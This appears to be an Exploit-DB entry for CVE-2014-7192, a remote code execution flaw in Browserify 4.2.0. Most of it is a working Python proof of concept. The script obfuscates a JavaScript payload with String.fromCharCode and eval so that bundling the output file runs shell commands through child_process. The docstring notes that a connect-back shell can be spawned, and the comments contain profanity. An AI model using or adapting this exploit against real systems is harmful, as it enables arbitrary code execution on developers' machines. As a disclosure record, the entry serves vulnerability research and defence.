Node Browserify 4.2.0 - Remote Code Execution

EDB-ID:

34090

CVE:

2014-7192

EDB Verified:

Author:

Cal Leeming

Type:

dos

Exploit:   /  

Platform:

Multiple

Date:

2014-07-16

Vulnerable App: 
#!/usr/bin/python
 
"""
Browserify POC exploit

http://iops.io/blog/browserify-rce-vulnerability/
 
To run, just do:
 
$ python poc.py > exploit.js
$ browserify exploit.js
BITCH I TOLD YOU THIS SHIT IS FABULOUS
[[garbage output]]
},{}]},{},[1]) 00:08:32 up 12:29,  3 users,  load average: 0.00, 0.02, 0.05
uid=1001(foxx) gid=1001(foxx) groups=1001(foxx),27(sudo),105(fuse)
 
You can also spawn() and create a connect back shell.
 
Enjoy
 
"""
 
def charencode(string):
    encoded=''
    for char in string:
        encoded=encoded+","+str(ord(char))
    return encoded[1:]
 
plaintext = """
   var require = this.process.mainModule.require;
   var sys = require('sys')
   var exec = require('child_process').exec;
   function puts(error, stdout, stderr) { sys.puts(stdout) }
   exec("uptime && id", puts);
   console.log("BITCH I TOLD YOU THIS SHIT IS FABULOUS");
"""
 
payload = charencode(plaintext)
final = "eval(String.fromCharCode(%s));" %(payload)
 
print "});"
print final
print "(function(){"
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services